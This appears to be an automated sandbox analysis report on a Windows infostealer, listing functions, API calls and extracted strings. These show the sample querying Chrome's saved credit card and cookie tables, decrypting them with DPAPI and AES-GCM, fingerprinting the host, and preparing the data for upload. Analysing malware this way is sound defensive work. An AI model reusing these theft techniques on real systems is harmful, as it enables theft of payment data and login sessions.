Instruction ID: b666d19dafc19927dacaf0e5cb219496dcabba2469d2fea151fa0591bff3fcf5
Opcode Fuzzy Hash: 271ba174ee22eec3dc9865f37236d7d438d27d4eb5701e7280d2f132180e55b3
Instruction Fuzzy Hash: B113E1709002289BEB28DB64CD8CBDDBB75AF55304F1081DAE409A7292D7B99FC8CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00418E2A Relevance: 110.1, APIs: 30, Strings: 32, Instructions: 1565COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00418E77

Strings

[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d , xrefs: 0041915B
AES, xrefs: 004190DB
sendcards, xrefs: 0041A49B
Qjh, xrefs: 004193DA
Holder: , xrefs: 004194B0
_CC_, xrefs: 00419D46
hxCT, xrefs: 0041931A
count, xrefs: 0041A372
Card Number: , xrefs: 004193DD
, xrefs: 004194BF
Phx\T, xrefs: 0041915A
*j, xrefs: 004190FD
hxCT, xrefs: 00419017
\Temp\, xrefs: 00419AFE
h^T, xrefs: 00419452
J, xrefs: 00419461
]@, xrefs: 0041A6A3
[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d , xrefs: 004190F8
idb, xrefs: 0041A0AD
hwid, xrefs: 0041A15B
Month/Year: , xrefs: 004193F4
hxCT, xrefs: 00419A65
log, xrefs: 0041A2B3
BT, xrefs: 0041A6AE
Kp, xrefs: 0041913F
.txt, xrefs: 00419DBF
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards, xrefs: 00418EBB
e_user, xrefs: 0041A0E8, 0041A104
QRy, xrefs: 0041926F
name, xrefs: 0041A204
hxCT, xrefs: 0041923B
@J@, xrefs: 0041A6CC

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: Holder: $Month/Year: $.txt$@J@$AES$Card Number: $Phx\T$QRy$Qjh$SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d $\Temp\$_CC_$count$e_user$hwid$hxCT$hxCT$hxCT$hxCT$h^T$idb$log$name$sendcards$*j$BT$J$Kp$]@$
API String ID: 3668304517-431510524
Opcode ID: 22c9bc8a388d3032b92d935a1b65bec663bf5a7ed2ce6264e07eab73be810edd
Instruction ID: a246d3b5a027cdc967d04b516ab34b34652b92c21a4fb397078fc8556f8a6823
Opcode Fuzzy Hash: 22c9bc8a388d3032b92d935a1b65bec663bf5a7ed2ce6264e07eab73be810edd
Instruction Fuzzy Hash: 22E2F070901228ABEB28DB64CD8CBDDBB75AF55304F1081DAE009A7292D7799FC8CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB03 Relevance: 109.1, APIs: 33, Strings: 28, Instructions: 2325
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memmove.VCRUNTIME140(?,?,?), ref: 0041FB95
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0041FE57
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,msg), ref: 0041FFB0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0041FFE6
_CxxThrowException.VCRUNTIME140(?,00555480), ref: 0042004F
memmove.VCRUNTIME140(00000000,?,?,?,?,?,00000002,;,00000003,Function_00144378,00000000), ref: 00420202
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(&name=,00000003,Function_00144378,00000000), ref: 004204D1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,msg,00000003), ref: 00420633
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(Function_00144378,00000000,SOFTWARE\WOW6432Node\Clients\StartMenuInternet), ref: 00420669
_CxxThrowException.VCRUNTIME140(?,00555480,Function_00144378,00000000,SOFTWARE\WOW6432Node\Clients\StartMenuInternet), ref: 004206EC
memmove.VCRUNTIME140(00000000,?,?,?,?,?,00000011,;,00000003,Function_00144378,00000000), ref: 004208A2

Part of subcall function 004055E0: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000), ref: 004056B1
Part of subcall function 004055E0: memmove.VCRUNTIME140(00000000,?,?,00000000,7FFFFFFF,00000000,?,00000000), ref: 004056C2

Part of subcall function 00405100: memmove.VCRUNTIME140(00000000,00000000,?,?,?,00000000,?,?,00000000,00000001,811C9DC5,?), ref: 00405142

Part of subcall function 00427FB0: memmove.VCRUNTIME140(?,00000001,00000002,3A5313C3,?,00000000,?,0042A221,[json.exception.,00000010,3A5313C3,3A5313C3), ref: 00427FEC

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(&name=,00000003,Function_00144378,00000000), ref: 00420B73
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,msg,00000003), ref: 00420CD5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(Function_00144378,00000000,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,7FFFFFFF), ref: 00420D0B
_CxxThrowException.VCRUNTIME140(?,00555480,Function_00144378,00000000,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,7FFFFFFF), ref: 00420D8E

Part of subcall function 0042EB60: memmove.VCRUNTIME140(?,?,?), ref: 0042EBD0
Part of subcall function 0042EB60: memmove.VCRUNTIME140(?,?,?,?,?,?), ref: 0042EBE0
Part of subcall function 0042EB60: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?), ref: 0042EBFB

memmove.VCRUNTIME140(?,?,?,00545D3C,, CommandLine: ,7FFFFFFF), ref: 004210E2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(\Temp\,?,00000000,?,?,00545D3C), ref: 004213D3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00545D3C), ref: 004214B5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00545D3C), ref: 0042150E
memset.VCRUNTIME140(?,00000000,000000B0,?,00000000,00000000,00000000,Proccesses.txt,0000000E,?,\Temp\,new,00000003,3A5313C3,00000000,7FFFFFFF), ref: 00421568

Part of subcall function 00404BE0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,iS@,?,00404AA4,3A5313C3,iS@,00000008,00000000,0052C1A0,000000FF,?,00000000,811C9DC5,?,?,00405369), ref: 00404C1B
Part of subcall function 00404BE0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(iS@,?,00404AA4,3A5313C3,iS@,00000008,00000000,0052C1A0,000000FF,?,00000000,811C9DC5,?,?,00405369), ref: 00404C34

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00545D3C), ref: 004215CB
memset.VCRUNTIME140(?,00000000,00000108,0000000E,?,\Temp\,new,00000003,3A5313C3,00000000,7FFFFFFF), ref: 004215E6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00421752

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004217F7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004218A0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,proccesses,0000000A), ref: 00421A00
?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(msg,00000003), ref: 00421BE4
?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(?,?,?), ref: 00421C08
??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(msg,00000003), ref: 00421C28
??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00421C34
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00421C40
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00421D3C
_CxxThrowException.VCRUNTIME140(3A5313C3,00555480,?,?,?,\Temp\,new,00000003,3A5313C3,00000000,7FFFFFFF), ref: 00421DB0

Strings

x, xrefs: 004200DE
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0042076C
softwares, xrefs: 00420BA8
hxCT, xrefs: 00420127
ID: , xrefs: 00420F03
Proccesses.txt, xrefs: 00421540
SOFTWARE\WOW6432Node\Clients\StartMenuInternet, xrefs: 004200CC
;, xrefs: 004201A4, 00420844
\Temp\, xrefs: 00421362
&hwid=, xrefs: 0041FC5F, 004202C7, 00420969
&name=, xrefs: 0041FCC9, 0042033A, 004209DC
]@, xrefs: 00421BA9
, CommandLine: , xrefs: 00420FCB
proccesses, xrefs: 004218D6
browsers, xrefs: 00420506
, Name: , xrefs: 00420F64
idb, xrefs: 004216BC
hwid, xrefs: 00421764
defenders, xrefs: 0041FE8C
new, xrefs: 00420E2C
@SC, xrefs: 004215F6
\, xrefs: 0042068E
e_user, xrefs: 0041FC3B, 0041FC48, 004202A3, 004202B0, 00420945, 00420952, 004216F7, 00421713
name, xrefs: 00421809
idb=, xrefs: 0041FC4B, 004202B3, 00420955
hZR, xrefs: 00420078
@J@, xrefs: 00421BD2
msg, xrefs: 0041FEFA, 00420574, 00420C16, 00421A63

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove$D@std@@@std@@U?$char_traits@$ExceptionThrow$memset$??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@?eback@?$basic_streambuf@?setg@?$basic_streambuf@?setstate@?$basic_ios@D00@Init@?$basic_streambuf@fclose
String ID: &hwid=$&name=$, CommandLine: $, Name: $;$@J@$@SC$ID: $Proccesses.txt$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Clients\StartMenuInternet$\Temp\$browsers$defenders$e_user$hZR$hwid$hxCT$idb$idb=$msg$name$new$proccesses$softwares$\$x$]@
API String ID: 228137308-3816530179
Opcode ID: 281b334a4b8021ae61b05354088e8e513d12d992d9faaa9e5acbb549d37102a3
Instruction ID: 0f8a379cf70a7f2efecbb60328a4fa3a614dd5b5aca7f3b2eaf3099afbb076a1
Opcode Fuzzy Hash: 281b334a4b8021ae61b05354088e8e513d12d992d9faaa9e5acbb549d37102a3
Instruction Fuzzy Hash: 5023F170E002688FEB14DB68DD89BDDBBB1AF55304F5082D9E008BB2D2DB795A84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004145AF Relevance: 95.0, APIs: 28, Strings: 25, Instructions: 2300
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405950: memmove.VCRUNTIME140(?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A16
Part of subcall function 00405950: memmove.VCRUNTIME140(00000000,811C9DC5,?,?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A27

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?), ref: 00414697
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,0054423C,?,?,00545E10,?,?,?,?,Function_00144378,00000000), ref: 0041472A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?,0054423C,?,?,00545E10,?,?,?,?,Function_00144378), ref: 00414822

Part of subcall function 00435BE0: memmove.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,3A5313C3,?,00000000), ref: 00435C89

omp_get_thread_num.VCOMP140 ref: 004148AB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00545CD8,?,?,?,?,?,?,?,?,?,0054423C), ref: 00414B26
BCryptOpenAlgorithmProvider.BCRYPT(0055D648,AES,00000000,00000000), ref: 00414F37
GetLastError.KERNEL32 ref: 00414F41
BCryptSetProperty.BCRYPT(ChainingMode,ChainingModeGCM,00000020,00000000), ref: 00414F63
GetLastError.KERNEL32 ref: 00414F6D
BCryptGenerateSymmetricKey.BCRYPT(Kp,00000000,00000000,?,?,00000000), ref: 00414F9A
GetLastError.KERNEL32 ref: 00414FA4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000400), ref: 00414FC7
BCryptDecrypt.BCRYPT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00415085
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041518C
memmove.VCRUNTIME140(?,?,?), ref: 004151AE
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?), ref: 00415622
strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,0000000A), ref: 0041564E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(Function_00144378,00000000), ref: 00416315
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000), ref: 004163DA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0041647B

Part of subcall function 0042AD10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,3A5313C3), ref: 0042AE07

Part of subcall function 00404840: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,0040254F,?,?,https://,https://,https://,?,?), ref: 004048B7

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00416578
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 004165D4

Strings

[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d , xrefs: 00414FAB
[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d , xrefs: 00414F74
AES, xrefs: 00414F2B
True, xrefs: 004157DD, 0041587A
C, xrefs: 004169BF
\Temp\tmp, xrefs: 004148CF
count, xrefs: 004168F7
stoll argument out of range, xrefs: 004162CF
ChainingModeGCM, xrefs: 00414F53
invalid stoll argument, xrefs: 004162DA
@, xrefs: 0041505D
\Temp\, xrefs: 004163F5
SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies, xrefs: 00414C9F
[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d , xrefs: 00414F48
sendcookies, xrefs: 00416949
idb, xrefs: 00416826
hwid, xrefs: 0041685C
False, xrefs: 004157E6, 00415883
log, xrefs: 004168C3
Kp, xrefs: 00414F8F
.txt, xrefs: 004166B6
ChainingMode, xrefs: 00414F58
_Cookies_, xrefs: 0041663D
e_user, xrefs: 0041683A
name, xrefs: 0041688F

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Crypt$memmove$ErrorLast$AlgorithmDataDecryptGenerateOpenPropertyProviderSymmetricUnprotect_errnomallocomp_get_thread_numstrtoll
String ID: .txt$@$AES$C$ChainingMode$ChainingModeGCM$False$SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies$True$[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d $\Temp\$\Temp\tmp$_Cookies_$count$e_user$hwid$idb$invalid stoll argument$log$name$sendcookies$stoll argument out of range$Kp
API String ID: 2912619272-2458039854
Opcode ID: 045855c930a39d586b629c7ff88feb3492ab4b3fe158b405ff3946a197387141
Instruction ID: 50a0a28f3c370108f7e07f33e3d2d841069d0d5c26eb3933c443895111bcaadc
Opcode Fuzzy Hash: 045855c930a39d586b629c7ff88feb3492ab4b3fe158b405ff3946a197387141
Instruction Fuzzy Hash: 2123EF719002289BEB28DB24CD4CBDDBB75AF95304F1082DAE409A7292DB789FC5CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041C05B Relevance: 87.6, APIs: 26, Strings: 22, Instructions: 3636memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00405950: memmove.VCRUNTIME140(?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A16
Part of subcall function 00405950: memmove.VCRUNTIME140(00000000,811C9DC5,?,?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A27

Part of subcall function 00405100: memmove.VCRUNTIME140(00000000,00000000,?,?,?,00000000,?,?,00000000,00000001,811C9DC5,?), ref: 00405142

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00545D3C,?,?,?,?,0000001C,0000000F,0000001C, | RAM: ,00000008,Function_00144378,00000000), ref: 0041C0D9
GetKeyboardLayout.USER32(00000000), ref: 0041C111
GetLocaleInfoW.KERNELBASE(?), ref: 0041C11B
memset.VCRUNTIME140(?,00000000,00000050,?,?), ref: 0041C173
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 0041C1EA
GetKeyboardLayoutList.USER32(00000000,00000000,?,?,?), ref: 0041C204
LocalAlloc.KERNEL32(00000040), ref: 0041C212
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0041C220
GetLocaleInfoW.KERNEL32(?,00000002,?,00000200), ref: 0041C27D
memset.VCRUNTIME140(?,00000000,00000050,?,?), ref: 0041C2D5
memmove.VCRUNTIME140(?,?,?), ref: 0041C3C8
memset.VCRUNTIME140(?,00000000,00000200,?,00000000,?,?), ref: 0041C4E6
LocalFree.KERNEL32(?), ref: 0041C50C
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0041C56D
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0041C58C
FreeSid.ADVAPI32(?), ref: 0041C5A2
_CxxThrowException.VCRUNTIME140(?,00555480,000000FF), ref: 0041DE87

Part of subcall function 00405950: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,811C9DC5,?,00000000,00000001,811C9DC5,?,?,?,?,?,0040542A,?), ref: 004059EA
Part of subcall function 00405950: Concurrency::cancel_current_task.LIBCPMT ref: 00405A41

Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DD15

Part of subcall function 00427FB0: memmove.VCRUNTIME140(?,00000001,00000002,3A5313C3,?,00000000,?,0042A221,[json.exception.,00000010,3A5313C3,3A5313C3), ref: 00427FEC

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0041C741
GetSystemMetrics.USER32 ref: 0041C774
GetSystemMetrics.USER32(00000001), ref: 0041C789
memmove.VCRUNTIME140(?,?,?,00545D3C,?,?,?,?,0000001C,0000000F,0000001C, | RAM: ,00000008,Function_00144378,00000000), ref: 0041C9FA

Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DD61
Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DD77

Part of subcall function 0042DC90: memmove.VCRUNTIME140(00000000,?,00000000,00000001,3A5313C3,?), ref: 0042DE36
Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DE53

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0041DA6E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,msg), ref: 0041DDED
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,00555480,000000FF), ref: 0041E7F7

Strings

&sizey=, xrefs: 0041D15A
&ram=, xrefs: 0041D1CF
osinfo, xrefs: 0041DA8B
&hwid=, xrefs: 0041CDC4
&name=, xrefs: 0041CF9C
True, xrefs: 0041CD69
| RAM: , xrefs: 0041C8FA
S, xrefs: 0041DB54
&langs=, xrefs: 0041CF27
False, xrefs: 0041CD72
&cpu=, xrefs: 0041D06C
&sizex=, xrefs: 0041D0E5
&lang=, xrefs: 0041CEB2
Cores, xrefs: 0041C63C
&os=, xrefs: 0041CE3D
&admin=, xrefs: 0041D011
e_user, xrefs: 0041CD9D, 0041CDAA
/Kim, xrefs: 0041CBA6
idb=, xrefs: 0041CDAD
&video=, xrefs: 0041D221
/Kim, xrefs: 0041CBBE
msg, xrefs: 0041DB0B

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn$KeyboardLayoutmemset$FreeInfoListLocalLocaleMetricsSystem$AllocAllocateCheckConcurrency::cancel_current_taskExceptionInitializeMembershipThrowToken
String ID: Cores$ | RAM: $&admin=$&cpu=$&hwid=$&lang=$&langs=$&name=$&os=$&ram=$&sizex=$&sizey=$&video=$/Kim$/Kim$False$S$True$e_user$idb=$msg$osinfo
API String ID: 2625345306-2272238700
Opcode ID: fa126901210a758995dfbcf2a24beafc6d2dcc13ace1b7ee41e52ae836cf066f
Instruction ID: acfa567381544b93aa3c561b62906825a56237560387272fb1861884cd8cc6cc
Opcode Fuzzy Hash: fa126901210a758995dfbcf2a24beafc6d2dcc13ace1b7ee41e52ae836cf066f
Instruction Fuzzy Hash: B6634E719006548FE72CCB38CD9C7EEBBA2AF42304F10469DD05A9B6D2D778AAC58F54

Uniqueness

Uniqueness Score: -1.00%

Function 004242F5 Relevance: 59.4, APIs: 14, Strings: 19, Instructions: 1695sleepstringCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000100,?,?,?,?,?,?,?,Function_00144378,00000000), ref: 004244C7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000020), ref: 004245B3
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 004245E3
?_Xout_of_range@std@@YAXPBD@Z.MSVCP140(stoi argument out of range,?,?,?,?,?,00000020), ref: 004254AE
memset.VCRUNTIME140(?,00000000,00000108,?,?,00000000,00000000,00000000,svchost.exe,0000000B,?,?,\Temp\,?,00000000,path), ref: 004258BA
ShellExecuteExW.SHELL32(?), ref: 0042598C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000), ref: 00425B53
?_Xinvalid_argument@std@@YAXPBD@Z.MSVCP140(invalid stoi argument,?,?,?,?,?,00000020), ref: 004254B9

Part of subcall function 00405950: memmove.VCRUNTIME140(?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A16
Part of subcall function 00405950: memmove.VCRUNTIME140(00000000,811C9DC5,?,?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A27

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 0041BC40: memset.VCRUNTIME140(00000000,00000000,00000108,?,00000001), ref: 0041BD37

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(\Temp\,?,00000000,path,00000004), ref: 0042567A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,\Temp\,?,00000000,path,00000004), ref: 00425765
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,\Temp\,?,00000000,path,00000004), ref: 004257BE

Part of subcall function 004104B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410530
Part of subcall function 004104B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410578

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00425D10
Sleep.KERNELBASE(00124F80), ref: 00425D48
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00425DBD

Strings

wallets, xrefs: 0042439F
', xrefs: 00425069
\Temp\, xrefs: 00425603
path, xrefs: 00425571
proccesses, xrefs: 00424312
browsers, xrefs: 00424340
bTbT, xrefs: 004243F2
files, xrefs: 0042436E
svchost.exe, xrefs: 004257E9
stoi argument out of range, xrefs: 004254A9
cards, xrefs: 00424E83
cookies, xrefs: 0042492D
invalid stoi argument, xrefs: 004254B4
getpu, xrefs: 00425516
e_user, xrefs: 004254DE, 004254EB
idb=, xrefs: 004254EE
fills, xrefs: 00424BDF
logs, xrefs: 00424675
browsers:, xrefs: 004243CB

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove$memset$ExecuteShellSleepXinvalid_argument@std@@Xout_of_range@std@@_errnostrtol
String ID: '$\Temp\$browsers$browsers:$cards$cookies$e_user$files$fills$getpu$idb=$invalid stoi argument$logs$path$proccesses$stoi argument out of range$svchost.exe$wallets$bTbT
API String ID: 550623192-921390169
Opcode ID: d71c40bdcee30d5c0c245e683c99ab0357e9230cd4bc4859962ccedea7526a67
Instruction ID: 892129226e91b0090b2346476585fad51e86c013ab49c5e93967ae5053733aee
Opcode Fuzzy Hash: d71c40bdcee30d5c0c245e683c99ab0357e9230cd4bc4859962ccedea7526a67
Instruction Fuzzy Hash: 97F2C171A002688BDB29DB24DD85BDDBBB5FF85308F5081D9E009A7285DB78ABC4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004C5FB0 Relevance: 28.3, APIs: 9, Strings: 7, Instructions: 288
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 004C5FE7
CoCreateInstance.OLE32(005404FC,00000000,00000001,005404EC,00000000), ref: 004C6017
CoUninitialize.OLE32 ref: 004C60D7
_CxxThrowException.VCRUNTIME140(?,005557D8,00530985,00000000), ref: 004C6144
_CxxThrowException.VCRUNTIME140(?,005557D8,00530985,80004003,?,005557D8,00530985,00000000), ref: 004C6174
_CxxThrowException.VCRUNTIME140(?,005557D8,00530985,80004002,?,005557D8,00530985,80004003,?,005557D8,00530985,00000000), ref: 004C61AA
_CxxThrowException.VCRUNTIME140(?,005557D8,00530985,80040110,?,005557D8,00530985,80004002,?,005557D8,00530985,80004003,?,005557D8,00530985,00000000), ref: 004C61E0
_CxxThrowException.VCRUNTIME140(?,005557D8,00530985,00000000,?,005557D8,00530985,80040110,?,005557D8,00530985,80004002,?,005557D8,00530985,80004003), ref: 004C6212
_CxxThrowException.VCRUNTIME140(00000000,005557D8,00530985,80040154,?,005557D8,00530985,00000000,?,005557D8,00530985,80040110,?,005557D8,00530985,80004002), ref: 004C6248

Strings

Error initializing IWbemLocator: E_NOINTERFACE, xrefs: 004C6179
Error initializing IWbemLocator: E_POINTER, xrefs: 004C6149
PyL, xrefs: 004C60AA
Error initializing IWbemLocator: CLASS_E_NOAGGREGATION, xrefs: 004C61AF
Error initializing IWbemLocator: Unknown Error, xrefs: 004C61E5
The COM library is already initialized on this thread, xrefs: 004C611A
Error initializing IWbemLocator: REGDB_E_CLASSNOTREG, xrefs: 004C6217

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ExceptionThrow$CreateInitializeInstanceUninitialize
